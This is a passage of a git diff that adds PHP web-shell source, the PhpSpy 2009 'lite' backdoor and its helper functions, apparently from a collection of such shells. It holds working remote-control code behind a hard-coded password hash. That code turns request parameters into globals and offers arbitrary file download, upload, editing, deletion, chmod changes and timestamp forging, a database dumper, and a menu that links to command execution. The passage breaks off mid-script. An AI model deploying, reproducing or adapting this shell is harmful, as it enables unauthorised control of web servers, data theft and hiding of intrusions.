+		@fputs($fp,@base64_decode($text));
+		@fclose($fp);
+	}
+}
+
+// Ò³Ãæµ÷ÊÔÐÅÏ¢
+function debuginfo() {
+	global $starttime;
+	$mtime = explode(' ', microtime());
+	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+	echo 'Processed in '.$totaltime.' second(s)';
+}
+
+//Á¬½ÓÊý¾Ý¿â
+function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
+	if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
+		p('<h2>Can not connect to MySQL server</h2>');
+		exit;
+	}
+	if($link && $dbname) {
+		if (!@mysql_select_db($dbname, $link)) {
+			p('<h2>Database selected has error</h2>');
+			exit;
+		}
+	}
+	if($link && mysql_get_server_info() > '4.1') {
+		if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
+			q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
+		}
+	}
+	return $link;
+}
+
+// È¥µôתÒå×Ö·û
+function s_array(&$array) {
+	if (is_array($array)) {
+		foreach ($array as $k => $v) {
+			$array[$k] = s_array($v);
+		}
+	} else if (is_string($array)) {
+		$array = stripslashes($array);
+	}
+	return $array;
+}
+
+// Çå³ýHTML´úÂë
+function html_clean($content) {
+	$content = htmlspecialchars($content);
+	$content = str_replace("\n", "<br />", $content);
+	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
+	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
+	return $content;
+}
+
+// »ñȡȨÏÞ
+function getChmod($filepath){
+	return substr(base_convert(@fileperms($filepath),10,8),-4);
+}
+
+function getPerms($filepath) {
+	$mode = @fileperms($filepath);
+	if (($mode & 0xC000) === 0xC000) {$type = 's';}
+	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
+	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
+	elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
+	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
+	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
+	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
+	else {$type = '?';}
+
+	$owner['read'] = ($mode & 00400) ? 'r' : '-'; 
+	$owner['write'] = ($mode & 00200) ? 'w' : '-'; 
+	$owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
+	$group['read'] = ($mode & 00040) ? 'r' : '-'; 
+	$group['write'] = ($mode & 00020) ? 'w' : '-'; 
+	$group['execute'] = ($mode & 00010) ? 'x' : '-'; 
+	$world['read'] = ($mode & 00004) ? 'r' : '-'; 
+	$world['write'] = ($mode & 00002) ? 'w' : '-'; 
+	$world['execute'] = ($mode & 00001) ? 'x' : '-'; 
+
+	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
+ 
+	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
+}
+
+function getUser($filepath)	{
+	if (function_exists('posix_getpwuid')) {
+		$array = @posix_getpwuid(@fileowner($filepath));
+		if ($array && is_array($array)) {
+			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
+		}
+	}
+	return '';
+}
+
+// ɾ³ýĿ¼
+function deltree($deldir) {
+	$mydir=@dir($deldir);	
+	while($file=$mydir->read())	{ 		
+		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 
+			@chmod($deldir.'/'.$file,0777);
+			deltree($deldir.'/'.$file); 
+		}
+		if (is_file($deldir.'/'.$file)) {
+			@chmod($deldir.'/'.$file,0777);
+			@unlink($deldir.'/'.$file);
+		}
+	} 
+	$mydir->close(); 
+	@chmod($deldir,0777);
+	return @rmdir($deldir) ? 1 : 0;
+}
+
+// ±í¸ñÐмäµÄ±³¾°É«Ìæ»»
+function bg() {
+	global $bgc;
+	return ($bgc++%2==0) ? 'alt1' : 'alt2';
+}
+
+// »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶
+function getPath($scriptpath, $nowpath) {
+	if ($nowpath == '.') {
+		$nowpath = $scriptpath;
+	}
+	$nowpath = str_replace('\\', '/', $nowpath);
+	$nowpath = str_replace('//', '/', $nowpath);
+	if (substr($nowpath, -1) != '/') {
+		$nowpath = $nowpath.'/';
+	}
+	return $nowpath;
+}
+
+// »ñÈ¡µ±Ç°Ä¿Â¼µÄÉϼ¶Ä¿Â¼
+function getUpPath($nowpath) {
+	$pathdb = explode('/', $nowpath);
+	$num = count($pathdb);
+	if ($num > 2) {
+		unset($pathdb[$num-1],$pathdb[$num-2]);
+	}
+	$uppath = implode('/', $pathdb).'/';
+	$uppath = str_replace('//', '/', $uppath);
+	return $uppath;
+}
+
+// ¼ì²éPHPÅäÖòÎÊý
+function getcfg($varname) {
+	$result = get_cfg_var($varname);
+	if ($result == 0) {
+		return 'No';
+	} elseif ($result == 1) {
+		return 'Yes';
+	} else {
+		return $result;
+	}
+}
+
+// ¼ì²éº¯ÊýÇé¿ö
+function getfun($funName) {
+	return (false !== function_exists($funName)) ? 'Yes' : 'No';
+}
+
+function GetList($dir){
+	global $dirdata,$j,$nowpath;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				if (is_writable($f)) {
+					$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
+					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$dirdata[$j]['dirchmod']=getChmod($f);
+					$dirdata[$j]['dirperm']=getPerms($f);
+					$dirdata[$j]['dirlink']=ue($dir);
+					$dirdata[$j]['server_link']=$f;
+					$dirdata[$j]['client_link']=ue($f);
+					$j++;
+				}
+				GetList($f);
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $dirdata;
+	} else {
+		return array();
+	}
+}
+
+function qy($sql) { 
+	//echo $sql.'<br>';
+	$res = $error = '';
+	if(!$res = @mysql_query($sql)) { 
+		return 0;
+	} else if(is_resource($res)) {
+		return 1; 
+	} else {
+		return 2;
+	}	
+	return 0;
+}
+
+function q($sql) { 
+	return @mysql_query($sql);
+}
+
+function fr($qy){
+	mysql_free_result($qy);
+}
+
+function sizecount($size) {
+	if($size > 1073741824) {
+		$size = round($size / 1073741824 * 100) / 100 . ' G';
+	} elseif($size > 1048576) {
+		$size = round($size / 1048576 * 100) / 100 . ' M';
+	} elseif($size > 1024) {
+		$size = round($size / 1024 * 100) / 100 . ' K';
+	} else {
+		$size = $size . ' B';
+	}
+	return $size;
+}
+
+// ѹËõ´ò°üÀà
+class PHPZip{
+	var $out='';
+	function PHPZip($dir)	{
+		if (@function_exists('gzcompress'))	{
+			$curdir = getcwd();
+			if (is_array($dir)) $filelist = $dir;
+			else{
+				$filelist=$this -> GetFileList($dir);//ÎļþÁбí
+				foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
+			}
+			if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
+			else chdir($curdir);
+			if (count($filelist)>0){
+				foreach($filelist as $filename){
+					if (is_file($filename)){
+						$fd = fopen ($filename, 'r');
+						$content = @fread ($fd, filesize($filename));
+						fclose ($fd);
+						if (is_array($dir)) $filename = basename($filename);
+						$this -> addFile($content, $filename);
+					}
+				}
+				$this->out = $this -> file();
+				chdir($curdir);
+			}
+			return 1;
+		}
+		else return 0;
+	}
+
+	// »ñµÃÖ¸¶¨Ä¿Â¼ÎļþÁбí
+	function GetFileList($dir){
+		static $a;
+		if (is_dir($dir)) {
+			if ($dh = opendir($dir)) {
+				while ($file = readdir($dh)) {
+					if($file!='.' && $file!='..'){
+						$f=$dir .'/'. $file;
+						if(is_dir($f)) $this->GetFileList($f);
+						$a[]=$f;
+					}
+				}
+				closedir($dh);
+			}
+		}
+		return $a;
+	}
+
+	var $datasec      = array();
+	var $ctrl_dir     = array();
+	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	var $old_offset   = 0;
+
+	function unix2DosTime($unixtime = 0) {
+		$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+		if ($timearray['year'] < 1980) {
+			$timearray['year']    = 1980;
+			$timearray['mon']     = 1;
+			$timearray['mday']    = 1;
+			$timearray['hours']   = 0;
+			$timearray['minutes'] = 0;
+			$timearray['seconds'] = 0;
+		} // end if
+		return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+				($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+	}
+
+	function addFile($data, $name, $time = 0) {
+		$name = str_replace('\\', '/', $name);
+
+		$dtime = dechex($this->unix2DosTime($time));
+		$hexdtime	= '\x' . $dtime[6] . $dtime[7]
+					. '\x' . $dtime[4] . $dtime[5]
+					. '\x' . $dtime[2] . $dtime[3]
+					. '\x' . $dtime[0] . $dtime[1];
+		eval('$hexdtime = "' . $hexdtime . '";');
+		$fr	= "\x50\x4b\x03\x04";
+		$fr	.= "\x14\x00";
+		$fr	.= "\x00\x00";
+		$fr	.= "\x08\x00";
+		$fr	.= $hexdtime;
+
+		$unc_len = strlen($data);
+		$crc = crc32($data);
+		$zdata = gzcompress($data);
+		$c_len = strlen($zdata);
+		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+		$fr .= pack('v', strlen($name));
+		$fr .= pack('v', 0);
+		$fr .= $name;
+		$fr .= $zdata;
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+
+		$this -> datasec[] = $fr;
+		$new_offset = strlen(implode('', $this->datasec));
+
+		$cdrec = "\x50\x4b\x01\x02";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x14\x00";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x08\x00";
+		$cdrec .= $hexdtime;
+		$cdrec .= pack('V', $crc);
+		$cdrec .= pack('V', $c_len);
+		$cdrec .= pack('V', $unc_len);
+		$cdrec .= pack('v', strlen($name) );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('V', 32 );
+		$cdrec .= pack('V', $this -> old_offset );
+		$this -> old_offset = $new_offset;
+		$cdrec .= $name;
+
+		$this -> ctrl_dir[] = $cdrec;
+	}
+
+	function file() {
+		$data    = implode('', $this -> datasec);
+		$ctrldir = implode('', $this -> ctrl_dir);
+		return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) .	pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
+	}
+}
+
+// ±¸·ÝÊý¾Ý¿â
+function sqldumptable($table, $fp=0) {
+	$tabledump = "DROP TABLE IF EXISTS $table;\n";
+	$tabledump .= "CREATE TABLE $table (\n";
+
+	$firstfield=1;
+
+	$fields = q("SHOW FIELDS FROM $table");
+	while ($field = mysql_fetch_array($fields)) {
+		if (!$firstfield) {
+			$tabledump .= ",\n";
+		} else {
+			$firstfield=0;
+		}
+		$tabledump .= "   $field[Field] $field[Type]";
+		if (!empty($field["Default"])) {
+			$tabledump .= " DEFAULT '$field[Default]'";
+		}
+		if ($field['Null'] != "YES") {
+			$tabledump .= " NOT NULL";
+		}
+		if ($field['Extra'] != "") {
+			$tabledump .= " $field[Extra]";
+		}
+	}
+	fr($fields);
+
+	$keys = q("SHOW KEYS FROM $table");
+	while ($key = mysql_fetch_array($keys)) {
+		$kname=$key['Key_name'];
+		if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
+			$kname="UNIQUE|$kname";
+		}
+		if(!is_array($index[$kname])) {
+			$index[$kname] = array();
+		}
+		$index[$kname][] = $key['Column_name'];
+	}
+	fr($keys);
+
+	while(list($kname, $columns) = @each($index)) {
+		$tabledump .= ",\n";
+		$colnames=implode($columns,",");
+
+		if ($kname == "PRIMARY") {
+			$tabledump .= "   PRIMARY KEY ($colnames)";
+		} else {
+			if (substr($kname,0,6) == "UNIQUE") {
+				$kname=substr($kname,7);
+			}
+			$tabledump .= "   KEY $kname ($colnames)";
+		}
+	}
+
+	$tabledump .= "\n);\n\n";
+	if ($fp) {
+		fwrite($fp,$tabledump);
+	} else {
+		echo $tabledump;
+	}
+
+	$rows = q("SELECT * FROM $table");
+	$numfields = mysql_num_fields($rows);
+	while ($row = mysql_fetch_array($rows)) {
+		$tabledump = "INSERT INTO $table VALUES(";
+
+		$fieldcounter=-1;
+		$firstfield=1;
+		while (++$fieldcounter<$numfields) {
+			if (!$firstfield) {
+				$tabledump.=", ";
+			} else {
+				$firstfield=0;
+			}
+
+			if (!isset($row[$fieldcounter])) {
+				$tabledump .= "NULL";
+			} else {
+				$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
+			}
+		}
+
+		$tabledump .= ");\n";
+
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+	}
+	fr($rows);
+	if ($fp) {
+		fwrite($fp,"\n");
+	} else {
+		echo "\n";
+	}
+}
+
+function ue($str){
+	return urlencode($str);
+}
+
+function p($str){
+	echo $str."\n";
+}
+
+function tbhead() {
+	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+}
+function tbfoot(){
+	p('</table>');
+}
+
+function makehide($name,$value=''){
+	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
+}
+
+function makeinput($arg = array()){
+	$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+	$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
+	!$arg['type'] && $arg['type'] = 'text';
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
+	if ($arg['newline']) {
+		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
+	} else {
+		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
+	}
+}
+
+function makeselect($arg = array()){
+	if ($arg['onchange']) {
+		$onchange = 'onchange="'.$arg['onchange'].'"';
+	}
+	$arg['title'] = $arg['title'] ? $arg['title'] : '';
+	if ($arg['newline']) p('<p>');
+	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
+		if (is_array($arg['option'])) {
+			foreach ($arg['option'] as $key=>$value) {
+				if ($arg['selected']==$key) {
+					p("<option value=\"$key\" selected>$value</option>");
+				} else {
+					p("<option value=\"$key\">$value</option>");
+				}
+			}
+		}
+	p("</select>");
+	if ($arg['newline']) p('</p>');
+}
+function formhead($arg = array()) {
+	!$arg['method'] && $arg['method'] = 'post';
+	!$arg['action'] && $arg['action'] = $self;
+	$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
+	!$arg['name'] && $arg['name'] = 'form1';
+	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
+	if ($arg['title']) {
+		p('<h2>'.$arg['title'].' &raquo;</h2>');
+	}
+}
+	
+function maketext($arg = array()){
+	!$arg['cols'] && $arg['cols'] = 100;
+	!$arg['rows'] && $arg['rows'] = 25;
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
+}
+
+function formfooter($name = ''){
+	!$name && $name = 'submit';
+	p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
+	p('</form>');
+}
+
+function formfoot(){
+	p('</form>');
+}
+
+// µ÷ÊÔº¯Êý
+function pr($a) {
+	echo '<pre>';
+	print_r($a);
+	echo '</pre>';
+}
+
+?>
\ No newline at end of file
diff --git a/php/phpspy/2009lite.php b/php/phpspy/2009lite.php
new file mode 100644
index 0000000..9aefe2e
--- /dev/null
+++ b/php/phpspy/2009lite.php
@@ -0,0 +1,1165 @@
+<?php
+
+error_reporting(7);
+@set_magic_quotes_runtime(0);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
+define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
+define('IS_COM', class_exists('COM') ? 1 : 0 );
+define('IS_GPC', get_magic_quotes_gpc());
+$dis_func = get_cfg_var('disable_functions');
+define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
+@set_time_limit(0);
+
+foreach(array('_GET','_POST') as $_request) {
+	foreach($$_request as $_key => $_value) {
+		if ($_key{0} != '_') {
+			if (IS_GPC) {
+				$_value = s_array($_value);
+			}
+			$$_key = $_value;
+		}
+	}
+}
+/*===================== ³ÌÐòÅäÖà =====================*/
+$admin = array();
+// ÊÇ·ñÐèÒªÃÜÂëÑéÖ¤, true ΪÐèÒªÑéÖ¤, false Ϊֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎÞЧ
+$admin['check'] = true;
+// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë
+$admin['pass']  = 'f4f068e71e0d87bf0ad51e6214ab84e9'; //angel
+
+//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
+// cookie ǰ׺
+$admin['cookiepre'] = '';
+// cookie ×÷ÓÃÓò
+$admin['cookiedomain'] = '';
+// cookie ×÷Ó÷¾¶
+$admin['cookiepath'] = '/';
+// cookie ÓÐЧÆÚ
+$admin['cookielife'] = 86400;
+/*===================== ÅäÖýáÊø =====================*/
+
+$charsetdb = array(
+	'armscii8',
+	'ascii',
+	'big5',
+	'binary',
+	'cp1250',
+	'cp1251',
+	'cp1256',
+	'cp1257',
+	'cp850',
+	'cp852',
+	'cp866',
+	'cp932',
+	'dec8',
+	'eucjpms',
+	'euckr',
+	'gb2312',
+	'gbk',
+	'geostd8',
+	'greek',
+	'hebrew',
+	'hp8',
+	'keybcs2',
+	'koi8r',
+	'koi8u',
+	'latin1',
+	'latin2',
+	'latin5',
+	'latin7',
+	'macce',
+	'macroman',
+	'sjis',
+	'swe7',
+	'tis620',
+	'ucs2',
+	'ujis',
+	'utf8'
+);
+if ($charset == 'utf8') {
+	header("content-Type: text/html; charset=utf-8");
+} elseif ($charset == 'big5') {
+	header("content-Type: text/html; charset=big5");
+} elseif ($charset == 'gbk') {
+	header("content-Type: text/html; charset=gbk");
+} elseif ($charset == 'latin1') {
+	header("content-Type: text/html; charset=iso-8859-2");
+} elseif ($charset == 'euckr') {
+	header("content-Type: text/html; charset=euc-kr");
+} elseif ($charset == 'eucjpms') {
+	header("content-Type: text/html; charset=euc-jp");
+}
+
+$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
+$timestamp = time();
+
+/*===================== Éí·ÝÑéÖ¤ =====================*/
+if ($action == "logout") {
+	scookie('loginpass', '', -86400 * 365);
+	p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+	p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+	exit;
+}
+if($admin['check']) {
+	if ($doing == 'login') {
+		if ($admin['pass'] == md5($password)) {
+			scookie('loginpass', md5($password));
+			p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+			p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+			exit;
+		}
+	}
+	if ($_COOKIE['loginpass']) {
+		if ($_COOKIE['loginpass'] != $admin['pass']) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/*===================== ÑéÖ¤½áÊø =====================*/
+
+$errmsg = '';
+
+// ²é¿´PHPINFO
+if ($action == 'phpinfo') {
+	if (IS_PHPINFO) {
+		phpinfo();
+		exit;
+	} else {
+		$errmsg = 'phpinfo() function has non-permissible';
+	}
+}
+
+// ÏÂÔØÎļþ
+if ($doing == 'downfile' && $thefile) {
+	if (!@file_exists($thefile)) {
+		$errmsg = 'The file you want Downloadable was nonexistent';
+	} else {
+		$fileinfo = pathinfo($thefile);
+		header('Content-type: application/x-'.$fileinfo['extension']);
+		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+		header('Content-Length: '.filesize($thefile));
+		@readfile($thefile);
+		exit;
+	}
+}
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gbk">
+<title><?php echo str_replace('.','','P.h.p.S.p.y');?></title>
+<style type="text/css">
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
+.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:underline;}
+a:hover{color: #f00;text-decoration:none;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
+.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+</style>
+<script type="text/javascript">
+function CheckAll(form) {
+	for(var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function $(id) {
+	return document.getElementById(id);
+}
+function goaction(act){
+	$('goaction').action.value=act;
+	$('goaction').submit();
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed; word-break:break-all">
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr class="head">
+		<td><span style="float:right;"><a href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> Ver: 2009 Build 20081222</a></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
+	</tr>
+	<tr class="alt1">
+		<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>
+			<a href="javascript:goaction('logout');">Logout</a> | 
+			<a href="javascript:goaction('file');">File Manager</a> | 
+			<a href="javascript:goaction('shell');">Execute Command</a> | 
+			<a href="javascript:goaction('phpenv');">PHP Variable</a>
+		</td>
+	</tr>
+</table>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<?php
+
+formhead(array('name'=>'goaction'));
+makehide('action');
+formfoot();
+
+$errmsg && m($errmsg);
+
+// »ñÈ¡µ±Ç°Â·¾¶
+if (!$dir) {
+	if ($_SERVER["DOCUMENT_ROOT"]) {
+		$dir = $_SERVER["DOCUMENT_ROOT"];
+	} else {
+		$dir = '.';
+	}
+}
+
+$nowpath = getPath(SA_ROOT, $dir);
+if (substr($dir, -1) != '/') {
+	$dir = $dir.'/';
+}
+$uedir = ue($dir);
+
+if (!$action || $action == 'file') {
+
+	// Åж϶ÁдÇé¿ö
+	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
+
+	// ɾ³ýĿ¼
+	if ($doing == 'deldir' && $thefile) {
+		if (!file_exists($thefile)) {
+			m($thefile.' directory does not exist');
+		} else {
+			m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
+		}
+	}
+
+	// ´´½¨Ä¿Â¼
+	elseif ($newdirname) {
+		$mkdirs = $nowpath.$newdirname;
+		if (file_exists($mkdirs)) {
+			m('Directory has already existed');
+		} else {
+			m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
+			@chmod($mkdirs,0777);
+		}
+	}
+
+	// ÉÏ´«Îļþ
+	elseif ($doupfile) {
+		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
+	}
+
+	// ±à¼­Îļþ
+	elseif ($editfilename && $filecontent) {
+		$fp = @fopen($editfilename,'w');
+		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
+		@fclose($fp);
+	}
+
+	// ±à¼­ÎļþÊôÐÔ
+	elseif ($pfile && $newperm) {
+		if (!file_exists($pfile)) {
+			m('The original file does not exist');
+		} else {
+			$newperm = base_convert($newperm,8,10);
+			m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
+		}
+	}
+
+	// ¸ÄÃû
+	elseif ($oldname && $newfilename) {
+		$nname = $nowpath.$newfilename;
+		if (file_exists($nname) || !file_exists($oldname)) {
+			m($nname.' has already existed or original file does not exist');
+		} else {
+			m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
+		}
+	}
+
+	// ¸´ÖÆÎļþ
+	elseif ($sname && $tofile) {
+		if (file_exists($tofile) || !file_exists($sname)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
+		}
+	}
+
+	// ¿Ë¡ʱ¼ä
+	elseif ($curfile && $tarfile) {
+		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			$time = @filemtime($tarfile);
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ×Ô¶¨Òåʱ¼ä
+	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
+		if (!@file_exists($curfile)) {
+			m(basename($curfile).' does not exist');
+		} else {
+			$time = strtotime("$year-$month-$day $hour:$minute:$second");
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ÅúÁ¿É¾³ýÎļþ
+	elseif($doing == 'delfiles') {
+		if ($dl) {
+			$dfiles='';
+			$succ = $fail = 0;
+			foreach ($dl as $filepath => $value) {
+				if (@unlink($filepath)) {
+					$succ++;
+				} else {
+					$fail++;
+				}
+			}
+			m('Deleted file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	//²Ù×÷Íê±Ï
+	formhead(array('name'=>'createdir'));
+	makehide('newdirname');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileperm'));
+	makehide('newperm');
+	makehide('pfile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'copyfile'));
+	makehide('sname');
+	makehide('tofile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'rename'));
+	makehide('oldname');
+	makehide('newfilename');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileopform', 'target'=>'_blank'));
+	makehide('action');
+	makehide('opfile');
+	makehide('dir');
+	formfoot();
+	formhead(array('name'=>'getsize'));
+	makehide('getdir');
+	makehide('dir');
+	formfoot();
+
+	$free = @disk_free_space($nowpath);
+	!$free && $free = 0;
+	$all = @disk_total_space($nowpath);
+	!$all && $all = 0;
+	$used = $all-$free;
+	$used_percent = @round(100/($all/$free),2);
+	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');
+
+?>
+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
+  <form action="" method="post" id="godir" name="godir">
+  <tr>
+    <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
+	<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
+    <td nowrap><input class="bt" value="GO" type="submit"></td>
+  </tr>
+  </form>
+</table>
+<script type="text/javascript">
+function createdir(){
+	var newdirname;
+	newdirname = prompt('Please input the directory name:', '');
+	if (!newdirname) return;
+	$('createdir').newdirname.value=newdirname;
+	$('createdir').submit();
+}
+function fileperm(pfile){
+	var newperm;
+	newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
+	if (!newperm) return;
